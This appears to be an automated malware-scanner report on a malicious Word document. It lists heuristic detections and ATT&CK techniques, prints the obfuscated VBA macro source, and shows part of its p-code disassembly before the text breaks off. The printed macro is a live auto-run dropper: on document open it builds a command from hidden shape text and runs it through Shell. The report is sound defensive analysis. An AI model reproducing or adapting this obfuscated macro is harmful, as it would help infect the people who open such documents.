MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro, which is designed to execute arbitrary code. Heuristics indicate suspicious calls to cmd.exe and PowerShell, suggesting the macro attempts to download and execute a second-stage payload. The ClamAV detection further confirms the malicious nature of the file.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6769463-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6769463-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
CWfNtAHzazmHlDGMJ = Hex(JksfLRhYnJoucPOGtG) pjCTjtY = Array(TKXuZsarp, NpkbzhjdH, AmvZCTij, [Interaction].Shell(TYhPwXvI, IBanSDFGTpJ), NmzTX) Select Case TGmqTvSULcqtipcZ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25048 bytes |
SHA-256: 726a022d05c688e6e40ec44721c8596e26901036e2f827765287efc00b29c430 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
216 of 266 identifiers look randomly generated (e.g. 'LNlmBjaSQWFrmwPpIsfbDEEd') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VTvzjuIaUT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case ViVwbMjjiabaJOVafpCFTUL
Case 297585003
NmtrqIYGShARlHOdauAFuQDd = ChrB(201279727 / ChrB(213818795))
wNaASbANZpssSC = qhUItiobtZLoEwiPMJ
Case 27213174
trjhpltoohChCaZWJVm = 142996249
lhaHnwQqZfiOdazA = 256915450
End Select
Set IoznLXdmiXLGrXiPIK = aCocwOCUTYzaWWC
jKzVDiBStfSoKjNSouMQ = Hex(MBZJCKNiwpkotBEKoC)
Select Case KmqJXjBIklQLzhaBR
Case 339001230
WJpRQlZwaVbHCoDj = ChrB(232416354 / ChrB(75244988))
zQBFZATOfzGjOsaw = VVaYzkbmIdNWtAq
Case 279107284
zvVDQRzXtzUpMPb = 287905321
LNlmBjaSQWFrmwPpIsfbDEEd = 4852681
End Select
Set kGzvNmfwodFUwP = lzurfHCEzEXwQtGJIlzvTVUJ
MpHmknuQfRFKlVwhCz = Hex(qpODiTwiATcQilYSRuRPQdj)
Select Case QcjWDqpkpSvjRHQJBtFkbu
Case 210363988
zzTjKzpNVSBGiwiRDAMG = ChrB(289418182 / ChrB(2408439))
NLOKSwlNVwCWDXGZqch = zGKfCKnhbiZozZFX
Case 314584291
WPjEjKbbiuzaVdKmaHBjHI = 69602615
mmXNWiRiiBGRiu = 170732176
End Select
Set DbjtjANviNzwWM = OFiStnOFzcOwTXtHfhAfj
RUlZbjJfSMRUsMAcjNp = Hex(jQVDtYkFTRVhBmoJjT)
Select Case CzKNbCihvmcCbLikdN
Case 90199606
IBZlksVNqauQGzmqmcGzjzO = ChrB(140626869 / ChrB(156037377))
pEOtFPhBOAXYdjhVrUrLvi = swBHQILnEOuCQzzVijE
Case 229051008
SOwWPNGtdMuLiVvDIRtDN = 129827971
jjRVuzMcqvoZjCkB = 306805893
End Select
Set taBzrmdBRWRLfXz = PqzsMuQkEPpwLB
PwwTtIjofrshqKiPRa = Hex(nuDCtzJRvcwhqQzCMhDF)
Select Case koJkicmXOjLNrrcE
Case 191703892
zUocrzVwZOUShi = ChrB(137156340 / ChrB(338207277))
MfIliiYpXIZJTUFPbpNW = zKPiCYCwCcsrNQZ
Case 132869265
TmPmTrvmGuPCFtHdV = 97223714
tCcKWtVfhRFDfvKWbG = 138367020
End Select
Set TTwvdmtwjlOsBEaOqbtt = LOVAqjHuXjWAkBaFjjjAYvvC
CbVwfzNbjHEbunDm = Hex(MFrrQCAIJvJsYP)
Select Case JRGoljkjshJlKuGvkIt
Case 184220369
jjzYuiiDzFdNTujJc = ChrB(321950683 / ChrB(68985950))
GvcpCzllMXDBEJZ = JPqCBjtbfYqAZmILjVIoD
Case 56307058
zszqbCbIKUuAMFIFaB = 7066606
dGlLaOsSjBlhAtt = 62460975
End Select
Set pRZEQjfimwFaPi = CztqHmQNJJYIjMzTMwCkjb
MaFjnSmrUTwfBAD = Hex(RZEPurXvSmdtbN)
Select Case BjcHRBjQKVcFqzBjWiul
Case 87384616
NScDaPqKwBbDFLJBpz = ChrB(76138182 / ChrB(238714779))
AvccOHvHsIqRjTJiNbTZAXb = mrqZUowadcNWAbLIvCFt
Case 237275433
YszWbVrKrdUzpWRVmELQoE = 37869532
imQLiwRhuATwZwMaiSkkCC = 247681091
End Select
Set qaPBiTzTmMspFjjtLmCpDT = orkiWUVlbAbVEiQzbCzLNFXV
mrZPAvkXiaKzkb = Hex(RbRoiKcKunbmEHijTPjjdwVb)
Set wZHGBqbzu = Shapes("MwzHXVzjl").TextFrame
Select Case tACwiBwZhicGwzEr
Case 75270819
ouZtaMZCpCjrsBjzuztwT = ChrB(189731106 / ChrB(114522866))
QzrfpNzihjPzlAZpWbLv = plaawEHwORMdtddUuNcDAK
Case 58573348
jOuXDZsRVqaMREsIskSSD = 149789453
XwUcOispicpuiKjupYuHDCR = 25407410
End Select
Set UTLPrqiJWWaizdicBvjbKJ = IpdtJPoVfRmtPhZnmHkMnIMr
LfCGhcfKVCZOzYuiBvRLkTv = Hex(IwUZzKAdlwzkmOzoGiu)
Select Case PPTlkdZjwwCiHdpqozbC
Case 8299
FJPRZCMnoidZnZRwbbnQvmVK = ChrB(121410038 / ChrB(130102145))
CNzijdSKKWSDXTKKYAhp = YqWAPjBSnFzFaJaqv
Case 325579654
UPHcIXQwkczJkdMdXbiRtQrW = 109171927
wwKkTcDlVBQNNcwnQq = 278172569
End Select
Set ObNfCPNfDDXlLpZTmAIUGzIL = JNFSFzAjUFWjihEO
hRdfCYCfBQhVpOTCSt = Hex(HNzEXFqkDjHSEF)
Select Case MhzVjdCvqHjiAPSbJ
Case 125005106
wOdVXtnOOYLWKjWkvF = ChrB(211122848 / ChrB(276859231))
aoRiClXXPdimfPCjLbbvP = XfkVzdiXWdciWZLqVIPqwu
Case 216886188
iTUBjdEuWlRmuhlttsGAJ = 320403417
cXUGSjYqcwAqfJdosYiMkIZ = 319348621
End Select
Set WVwGnfaiZsdOXlOzvontqG = QDOcakITwYSvKbjoSZIFQ
ZVnUOpTlDzQljCZDAzRYfqEp = Hex(VLAVTiATQitoFV)
TYhPwXvI = wZHGBqbzu.TextRange.Text + OZKosU + VVfYv + zQsdTQ + QRPYjO + kHuXLbw + rpdpjwm + zXSUiKf + HfIizi + prEqS + UBPinlRz + XFwIr + cvXuVBH
Select Case GmdOzoNpoKQlXNZiojUJXv
Case 101630244
zusFIpoKWjvzGJzVFMzHi = ChrB(317864744 / ChrB(96134589))
MXsJBVSKXuQEvHjwWFPnScbf = zDKwHEBjttlwiIBQlZMs
Case 310814966
zjAlYhbjjvNcCRINPpP = 158699921
OuCrzNWhCPmlYF = 194535018
End Select
Set WjUFNJpjCFjIXKXdXZjmwtbT = zjjaqiMfRtIuTn
ETpriOKsrJOzWrz = Hex(EBAOdJILbXdFQOiEldhf)
Select Case NBQVTXzOmpodsqzMuHntl
Case 169451062
OrnDztCzqYAjsMtokQKvNC = ChrB(223717605 / ChrB(305442077))
UMpXDFwoMCdfUBUkqzE = GGzBSCdbibLJtddhNbnTCvj
Case 63539159
IQOpLXEdDSNMnFAbX = 65457950
qTmqYnWOKloLaqlJmOlSE = 44842407
End Select
Set pLPUZWmrflwSwWapCoIu = OGnWCvOMmqfknwiJTzsYtIZ
XonMZiivMobEczXaXitu = Hex(iJZvjjrQWwFhIzNHC)
Select Case CDwZjBuvhQAnwjiBD
Case 253446959
tkwidfwYRudEMlNUQ = ChrB(201309335 / ChrB(175480860))
BiDbrQlzXYCEJkCd = YStlcdBELnBiLN
Case 148084342
bOOjXnNuAAtrZubikQrM = 218055669
YBCWfcjOMKjbiWnwhlE = 337160611
End Select
Set bkJfRMSwvVKvCqNiAHlKm = iLzMFvniGHhowRsrOPQQQp
fjfaShdToznBzhEHXL = Hex(PDNNtvlItVuVYtpR)
Select Case jqBuKitlvEYFhIACNX
Case 104576291
fXZzidUKuskWjTGfVYnbYjvk = ChrB(63085689 / ChrB(171358378))
CCTmqBzrLQEMjNiqDUCZ = CVjojoavcpnIASIb
Case 34104139
UjcuORMGNqsrQHAPzhnwGNZ = 311445327
bRDjvaPwahskHGObdakDl = 161846354
End Select
Set HlSanGnHHhLnAIaSPctq = IiraYWdmpszCkwvcAbr
ZlDwTOTDIUasiGzGaAOkJV = Hex(pNlPMfpPABCzWbvHJ)
Select Case BlUaTjEkLKqRRwdB
Case 293612046
jHAmbSuUavTcTlZCqXzwB = ChrB(211326798 / ChrB(41327826))
iJBRfkLkHbIdLPKCfzGIQi = EsOFFDujABKISQcppkjVsdv
Case 280899714
NvTCZzYvSzZQfFjMuIc = 5430196
slCJRYhNwbwYisH = 177734232
End Select
Set bDmMzTDZKiCIwUSpTVKR = HZqiTWcsANZlQhYOvsRwkHt
EAGiiKWwJlTivifzahJR = Hex(WhnubYcsSIAfKdTPwJpq)
Const IBanSDFGTpJ = 0
Select Case BzHiVvYiVYLqdQjFGH
Case 84092189
ausjjCnCzjpAVJWXlzn = ChrB(24504839 / ChrB(12500079))
LAPArGbcfPkPwGHaBT = VjmiKUTuMUJTJXH
Case 234454503
RfKhbUDaPGNPQLvUwjmYREj = 155842665
PIWwbrpXPIWIauMi = 52080361
End Select
Set NGfvJOwNrUKZNznWMMhioPY = ACZMVlaqKJSRjTwIzOAUMpv
VDizBdGwhnuHpmrFuU = Hex(DhVqsOZjZPEjLHCqR)
Select Case uZvDONZKwBLOrPoXTKWGHZ
Case 303291246
WpaQPriiqlwFLZQR = ChrB(128392514 / ChrB(307839906))
hfijscNvjRIjUfijYmIvF = hYGSiMutEnNoMhoIho
Case 13448774
BMhFcactrfKzjNwJaatABmN = 144558808
fSBrQFUtJRVrAqIjAC = 168407634
End Select
Set NIwjfiHuBtPwLmwHbBba = GWvcSZklRAkntFXUSMhzZr
CWfNtAHzazmHlDGMJ = Hex(JksfLRhYnJoucPOGtG)
pjCTjtY = Array(TKXuZsarp, NpkbzhjdH, AmvZCTij, [Interaction].Shell(TYhPwXvI, IBanSDFGTpJ), NmzTX)
Select Case TGmqTvSULcqtipcZ
Case 312427257
wBMNGWnPJKsojofUopica = ChrB(107064789 / ChrB(246019953))
tAOUwMZlzNuTwF = QCDlHbWsBOOAmvSGjQLUGHTR
Case 326829996
HoWuLVjqOZWidZXHNFkLn = 279019063
GNDnltIjmnWUhVGCsRvj = 296947263
End Select
Set BmlwwtNjmzQHQjIhzzGqk = GFpmHCstrJnWMQCouOVFBZD
FatKUwaCzKfjHMmLosG = Hex(TtUsfICrUfphBPj)
Select Case FqkjqWocALjqMHtsWd
Case 74074848
SnajslBuQHYIcLOzn = ChrB(91446597 / ChrB(285404837))
KVBtLHBKdHUYjOASQBqE = tMtmXOBsuEIlhGwmjY
Case 249354792
qRImzZNKwjmXmIRJIGntA = 120197150
CMmBIEjjdEVicEGmwArvK = 122742128
End Select
Set zYpndaksjYiFaNXFGQAIS = ipECTpsJWYkandTRC
sLmFtwfZaukfKJS = Hex(uAibHvAZCJUzZumpOrQHi)
Select Case THJbUQKOjNEIUbHBNw
Case 6072727
DjlroBVIJpGZXp = ChrB(253142088 / ChrB(298914138))
kbSXFolZjLiuFGQWfT = WSmSuCErHflfoOjdVijzrA
Case 113311646
qrNEjpCsVzXDzIY = 136072290
wduwjpfZdvozWv = 140779333
End Select
Set hcDoAIScsJprdf = KLvuWWGJBiiFtOtz
BBPfVjBoLRFWzo = Hex(ziinaAwibSBGVCYOzKlpbQho)
Select Case ZGDcYauZldnrcrHpVGSq
Case 45611612
KdDbvqJzhFrhvVc = ChrB(250400391 / ChrB(173090289))
EKobizBZtrIZsnZTwaZziEQ = vhzuwmNjjamwSiuGZWzRoI
Case 91011696
IcYBMcOztAfBzH = 191682756
iZsRAcANfSXIHwz = 260594828
End Select
Set ulTNLWDMmCSDtIStqn = PvEjbKWuFGsvArhCV
tTDpFNZiKlJFORK = Hex(XXqFsCocwGtHRLLGwkwUL)
End Sub
' Processing file: /tmp/qstore_ln_4uaot
' ===============================================================================
' Module streams:
' Macros/VBA/VTvzjuIaUT - 14062 bytes
' Line #0:
' FuncDefn (Private Sub Document_open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld ViVwbMjjiabaJOVafpCFTUL
' SelectCase
' Line #3:
' LitDI4 0xC96B 0x11BC
' Case
' CaseDone
' Line #4:
' LitDI4 0x48EF 0x0BFF
' LitDI4 0x9DAB 0x0CBE
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St NmtrqIYGShARlHOdauAFuQDd
' Line #5:
' Ld qhUItiobtZLoEwiPMJ
' St wNaASbANZpssSC
' Line #6:
' LitDI4 0x3D76 0x019F
' Case
' CaseDone
' Line #7:
' LitDI4 0xF319 0x0885
' St trjhpltoohChCaZWJVm
' Line #8:
' LitDI4 0x37FA 0x0F50
' St lhaHnwQqZfiOdazA
' Line #9:
' EndSelect
' Line #10:
' SetStmt
' Ld aCocwOCUTYzaWWC
' Set IoznLXdmiXLGrXiPIK
' Line #11:
' Ld MBZJCKNiwpkotBEKoC
' ArgsLd Hex 0x0001
' St jKzVDiBStfSoKjNSouMQ
' Line #12:
' Ld KmqJXjBIklQLzhaBR
' SelectCase
' Line #13:
' LitDI4 0xBF8E 0x1434
' Case
' CaseDone
' Line #14:
' LitDI4 0x6462 0x0DDA
' LitDI4 0x25BC 0x047C
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St WJpRQlZwaVbHCoDj
' Line #15:
' Ld VVaYzkbmIdNWtAq
' St zQBFZATOfzGjOsaw
' Line #16:
' LitDI4 0xD6D4 0x10A2
' Case
' CaseDone
' Line #17:
' LitDI4 0x1629 0x1129
' St zvVDQRzXtzUpMPb
' Line #18:
' LitDI4 0x0BC9 0x004A
' St LNlmBjaSQWFrmwPpIsfbDEEd
' Line #19:
' EndSelect
' Line #20:
' SetStmt
' Ld lzurfHCEzEXwQtGJIlzvTVUJ
' Set kGzvNmfwodFUwP
' Line #21:
' Ld qpODiTwiATcQilYSRuRPQdj
' ArgsLd Hex 0x0001
' St MpHmknuQfRFKlVwhCz
' Line #22:
' Ld QcjWDqpkpSvjRHQJBtFkbu
' SelectCase
' Line #23:
' LitDI4 0xE654 0x0C89
' Case
' CaseDone
' Line #24:
' LitDI4 0x2BC6 0x1140
' LitDI4 0xBFF7 0x0024
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St zzTjKzpNVSBGiwiRDAMG
' Line #25:
' Ld zGKfCKnhbiZozZFX
' St NLOKSwlNVwCWDXGZqch
' Line #26:
' LitDI4 0x2CE3 0x12C0
' Case
' CaseDone
' Line #27:
' LitDI4 0x0D37 0x0426
' St WPjEjKbbiuzaVdKmaHBjHI
' Line #28:
' LitDI4 0x2A90 0x0A2D
' St mmXNWiRiiBGRiu
' Line #29:
' EndSelect
' Line #30:
' SetStmt
' Ld OFiStnOFzcOwTXtHfhAfj
' Set DbjtjANviNzwWM
' Line #31:
' Ld jQVDtYkFTRVhBmoJjT
' ArgsLd Hex 0x0001
' St RUlZbjJfSMRUsMAcjNp
' Line #32:
' Ld CzKNbCihvmcCbLikdN
' SelectCase
' Line #33:
' LitDI4 0x5636 0x0560
' Case
' CaseDone
' Line #34:
' LitDI4 0xCBB5 0x0861
' LitDI4 0xF101 0x094C
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St IBZlksVNqauQGzmqmcGzjzO
' Line #35:
' Ld swBHQILnEOuCQzzVijE
' St pEOtFPhBOAXYdjhVrUrLvi
' Line #36:
' LitDI4 0x0A80 0x0DA7
' Case
' CaseDone
' Line #37:
' LitDI4 0x0483 0x07BD
' St SOwWPNGtdMuLiVvDIRtDN
' Line #38:
' LitDI4 0x7C85 0x1249
' St jjRVuzMcqvoZjCkB
' Line #39:
' EndSelect
' Line #40:
' SetStmt
' Ld PqzsMuQkEPpwLB
' Set taBzrmdBRWRLfXz
' Line #41:
' Ld nuDCtzJRvcwhqQzCMhDF
' ArgsLd Hex 0x0001
' St PwwTtIjofrshqKiPRa
' Line #42:
' Ld koJkicmXOjLNrrcE
' SelectCase
' Line #43:
' LitDI4 0x2B54 0x0B6D
' Case
' CaseDone
' Line #44:
' LitDI4 0xD6F4 0x082C
' LitDI4 0xA22D 0x1428
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St zUocrzVwZOUShi
' Line #45:
' Ld zKPiCYCwCcsrNQZ
' St MfIliiYpXIZJTUFPbpNW
' Line #46:
' LitDI4 0x6C91 0x07EB
' Case
' CaseDone
' Line #47:
' LitDI4 0x8422 0x05CB
' St TmPmTrvmGuPCFtHdV
' Line #48:
' LitDI4 0x502C 0x083F
' St tCcKWtVfhRFDfvKWbG
' Line #49:
' EndSelect
' Line #50:
' SetStmt
' Ld LOVAqjHuXjWAkBaFjjjAYvvC
' Set TTwvdmtwjlOsBEaOqbtt
' Line #51:
' Ld MFrrQCAIJvJsYP
' ArgsLd Hex 0x0001
' St CbVwfzNbjHEbunDm
' Line #52:
' Ld JRGoljkjshJlKuGvkIt
' SelectCase
' Line #53:
' LitDI4 0xFAD1 0x0AFA
' Case
' CaseDone
' Line #54:
' LitDI4 0x93DB 0x1330
' LitDI4 0xA45E 0x041C
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St jjzYuiiDzFdNTujJc
' Line #55:
' Ld JPqCBjtbfYqAZmILjVIoD
' St GvcpCzllMXDBEJZ
' Line #56:
' LitDI4 0x2D72 0x035B
' Case
' CaseDone
' Line #57:
' LitDI4 0xD3EE 0x006B
' St zszqbCbIKUuAMFIFaB
' Line #58:
' LitDI4 0x142F 0x03B9
' St dGlLaOsSjBlhAtt
' Line #59:
' EndSelect
' Line #60:
' SetStmt
' Ld CztqHmQNJJYIjMzTMwCkjb
' Set pRZEQjfimwFaPi
' Line #61:
' Ld RZEPurXvSmdtbN
' ArgsLd Hex 0x0001
' St MaFjnSmrUTwfBAD
' Line #62:
' Ld BjcHRBjQKVcFqzBjWiul
' SelectCase
' Line #63:
' LitDI4 0x6228 0x0535
' Case
' CaseDone
' Line #64:
' LitDI4 0xC6C6 0x0489
' LitDI4 0x7F9B 0x0E3A
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St NScDaPqKwBbDFLJBpz
' Line #65:
' Ld mrqZUowadcNWAbLIvCFt
' St AvccOHvHsIqRjTJiNbTZAXb
' Line #66:
' LitDI4 0x8929 0x0E24
' Case
' CaseDone
' Line #67:
' LitDI4 0xD7DC 0x0241
' St YszWbVrKrdUzpWRVmELQoE
' Line #68:
' LitDI4 0x5043 0x0EC3
' St imQLiwRhuATwZwMaiSkkCC
' Line #69:
' EndSelect
' Line #70:
' SetStmt
' Ld orkiWUVlbAbVEiQzbCzLNFXV
' Set qaPBiTzTmMspFjjtLmCpDT
' Line #71:
' Ld RbRoiKcKunbmEHijTPjjdwVb
' ArgsLd Hex 0x0001
' St mrZPAvkXiaKzkb
' Line #72:
' SetStmt
' LitStr 0x0009 "MwzHXVzjl"
' ArgsLd Shapes 0x0001
' MemLd TextFrame
' Set wZHGBqbzu
' Line #73:
' Ld tACwiBwZhicGwzEr
' SelectCase
' Line #74:
' LitDI4 0x8AA3 0x047C
' Case
' CaseDone
' Line #75:
' LitDI4 0x1122 0x0B4F
' LitDI4 0x7AF2 0x06D3
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St ouZtaMZCpCjrsBjzuztwT
' Line #76:
' Ld plaawEHwORMdtddUuNcDAK
' St QzrfpNzihjPzlAZpWbLv
' Line #77:
' LitDI4 0xC224 0x037D
' Case
' CaseDone
' Line #78:
' LitDI4 0x9B0D 0x08ED
' St jOuXDZsRVqaMREsIskSSD
' Line #79:
' LitDI4 0xAFB2 0x0183
' St XwUcOispicpuiKjupYuHDCR
' Line #80:
' EndSelect
' Line #81:
' SetStmt
' Ld IpdtJPoVfRmtPhZnmHkMnIMr
' Set UTLPrqiJWWaizdicBvjbKJ
' Line #82:
' Ld IwUZzKAdlwzkmOzoGiu
' ArgsLd Hex 0x0001
' St LfCGhcfKVCZOzYuiBvRLkTv
' Line #83:
' Ld PPTlkdZjwwCiHdpqozbC
' SelectCase
' Line #84:
' LitDI2 0x206B
' Case
' CaseDone
' Line #85:
' LitDI4 0x91F6 0x073C
' LitDI4 0x3381 0x07C1
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St FJPRZCMnoidZnZRwbbnQvmVK
' Line #86:
' Ld YqWAPjBSnFzFaJaqv
' St CNzijdSKKWSDXTKKYAhp
' Line #87:
' LitDI4 0xF386 0x1367
' Case
' CaseDone
' Line #88:
' LitDI4 0xD4D7 0x0681
' St UPHcIXQwkczJkdMdXbiRtQrW
' Line #89:
' LitDI4 0x9399 0x1094
' St wwKkTcDlVBQNNcwnQq
' Line #90:
' EndSelect
' Line #91:
' SetStmt
' Ld JNFSFzAjUFWjihEO
' Set ObNfCPNfDDXlLpZTmAIUGzIL
' Line #92:
' Ld HNzEXFqkDjHSEF
' ArgsLd Hex 0x0001
' St hRdfCYCfBQhVpOTCSt
' Line #93:
' Ld MhzVjdCvqHjiAPSbJ
' SelectCase
' Line #94:
' LitDI4 0x6D32 0x0773
' Case
' CaseDone
' Line #95:
' LitDI4 0x7AA0 0x0C95
' LitDI4 0x895F 0x1080
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St wOdVXtnOOYLWKjWkvF
' Line #96:
' Ld XfkVzdiXWdciWZLqVIPqwu
' St aoRiClXXPdimfPCjLbbvP
' Line #97:
' LitDI4 0x6BAC 0x0CED
' Case
' CaseDone
' Line #98:
' LitDI4 0xF7D9 0x1318
' St iTUBjdEuWlRmuhlttsGAJ
' Line #99:
' LitDI4 0xDF8D 0x1308
' St cXUGSjYqcwAqfJdosYiMkIZ
' Line #100:
' EndSelect
' Line #101:
' SetStmt
' Ld QDOcakITwYSvKbjoSZIFQ
' Set WVwGnfaiZsdOXlOzvontqG
' Line #102:
' Ld VLAVTiATQitoFV
' ArgsLd Hex 0x0001
' St ZVnUOpTlDzQljCZDAzRYfqEp
' Line #103:
' Ld wZHGBqbzu
' MemLd TextRange
' MemLd Text
' Ld OZKosU
' Add
' Ld VVfYv
' Add
' Ld zQsdTQ
' Add
' Ld QRPYjO
' Add
' Ld kHuXLbw
' Add
' Ld rpdpjwm
' Add
' Ld zXSUiKf
' Add
' Ld HfIizi
' Add
' Ld prEqS
' Add
' Ld UBPinlRz
' Add
' Ld XFwIr
' Add
' Ld cvXuVBH
' Add
' St TYhPwXvI
' Line #104:
' Ld GmdOzoNpoKQlXNZiojUJXv
' SelectCase
' Line #105:
' LitDI4 0xC124 0x060E
' Case
' CaseDone
' Line #106:
' LitDI4 0x3B28 0x12F2
' LitDI4 0xE5BD 0x05BA
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St zusFIpoKWjvzGJzVFMzHi
' Line #107:
' Ld zDKwHEBjttlwiIBQlZMs
' St MXsJBVSKXuQEvHjwWFPnScbf
' Line #108:
' LitDI4 0xA8F6 0x1286
' Case
' CaseDone
' Line #109:
' LitDI4 0x9191 0x0975
' St zjAlYhbjjvNcCRINPpP
' Line #110:
' LitDI4 0x5E6A 0x0B98
' St OuCrzNWhCPmlYF
' Line #111:
' EndSelect
' Line #112:
' SetStmt
' Ld zjjaqiMfRtIuTn
' Set WjUFNJpjCFjIXKXdXZjmwtbT
' Line #113:
' Ld EBAOdJILbXdFQOiEldhf
' ArgsLd Hex 0x0001
' St ETpriOKsrJOzWrz
' Line #114:
' Ld NBQVTXzOmpodsqzMuHntl
' SelectCase
' Line #115:
' LitDI4 0x9E36 0x0A19
' Case
' CaseDone
' Line #116:
' LitDI4 0xA8E5 0x0D55
' LitDI4 0xAD1D 0x1234
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St OrnDztCzqYAjsMtokQKvNC
' Line #117:
' Ld GGzBSCdbibLJtddhNbnTCvj
' St UMpXDFwoMCdfUBUkqzE
' Line #118:
' LitDI4 0x87D7 0x03C9
' Case
' CaseDone
' Line #119:
' LitDI4 0xCF1E 0x03E6
' St IQOpLXEdDSNMnFAbX
' Line #120:
' LitDI4 0x3DA7 0x02AC
' St qTmqYnWOKloLaqlJmOlSE
' Line #121:
' EndSelect
' Line #122:
' SetStmt
' Ld OGnWCvOMmqfknwiJTzsYtIZ
' Set pLPUZWmrflwSwWapCoIu
' Line #123:
' Ld iJZvjjrQWwFhIzNHC
' ArgsLd Hex 0x0001
' St XonMZiivMobEczXaXitu
' Line #124:
' Ld CDwZjBuvhQAnwjiBD
' SelectCase
' Line #125:
' LitDI4 0x4B2F 0x0F1B
' Case
' CaseDone
' Line #126:
' LitDI4 0xBC97 0x0BFF
' LitDI4 0xA01C 0x0A75
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St tkwidfwYRudEMlNUQ
' Line #127:
' Ld YStlcdBELnBiLN
' St BiDbrQlzXYCEJkCd
' Line #128:
' LitDI4 0x9676 0x08D3
' Case
' CaseDone
' Line #129:
' LitDI4 0x43F5 0x0CFF
' St bOOjXnNuAAtrZubikQrM
' Line #130:
' LitDI4 0xA9A3 0x1418
' St YBCWfcjOMKjbiWnwhlE
' Line #131:
' EndSelect
' Line #132:
' SetStmt
' Ld iLzMFvniGHhowRsrOPQQQp
' Set bkJfRMSwvVKvCqNiAHlKm
' Line #133:
' Ld PDNNtvlItVuVYtpR
' ArgsLd Hex 0x0001
' St fjfaShdToznBzhEHXL
' Line #134:
' Ld jqBuKitlvEYFhIACNX
' SelectCase
' Line #135:
' LitDI4 0xB523 0x063B
' Case
' CaseDone
' Line #136:
' LitDI4 0x9C79 0x03C2
' LitDI4 0xB8AA 0x0A36
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St fXZzidUKuskWjTGfVYnbYjvk
' Line #137:
' Ld CVjojoavcpnIASIb
' St CCTmqBzrLQEMjNiqDUCZ
' Line #138:
' LitDI4 0x634B 0x0208
' Case
' CaseDone
' Line #139:
' LitDI4 0x474F 0x1290
' St UjcuORMGNqsrQHAPzhnwGNZ
' Line #140:
' LitDI4 0x9452 0x09A5
' St bRDjvaPwahskHGObdakDl
' Line #141:
' EndSelect
' Line #142:
' SetStmt
' Ld IiraYWdmpszCkwvcAbr
' Set HlSanGnHHhLnAIaSPctq
' Line #143:
' Ld pNlPMfpPABCzWbvHJ
' ArgsLd Hex 0x0001
' St ZlDwTOTDIUasiGzGaAOkJV
' Line #144:
' Ld BlUaTjEkLKqRRwdB
' SelectCase
' Line #145:
' LitDI4 0x2A0E 0x1180
' Case
' CaseDone
' Line #146:
' LitDI4 0x974E 0x0C98
' LitDI4 0x9CD2 0x0276
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St jHAmbSuUavTcTlZCqXzwB
' Line #147:
' Ld EsOFFDujABKISQcppkjVsdv
' St iJBRfkLkHbIdLPKCfzGIQi
' Line #148:
' LitDI4 0x3082 0x10BE
' Case
' CaseDone
' Line #149:
' LitDI4 0xDBB4 0x0052
' St NvTCZzYvSzZQfFjMuIc
' Line #150:
' LitDI4 0x0258 0x0A98
' St slCJRYhNwbwYisH
' Line #151:
' EndSelect
' Line #152:
' SetStmt
' Ld HZqiTWcsANZlQhYOvsRwkHt
' Set bDmMzTDZKiCIwUSpTVKR
' Line #153:
' Ld WhnubYcsSIAfKdTPwJpq
' ArgsLd Hex 0x0001
' St EAGiiKWwJlTivifzahJR
' Line #154:
' Dim (Const)
' LitDI2 0x0000
' VarDefn IBanSDFGTpJ
' Line #155:
' Ld BzHiVvYiVYLqdQjFGH
' SelectCase
' Line #156:
' LitDI4 0x251D 0x0503
' Case
' CaseDone
' Line #157:
' LitDI4 0xEA07 0x0175
' LitDI4 0xBC6F 0x00BE
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St ausjjCnCzjpAVJWXlzn
' Line #158:
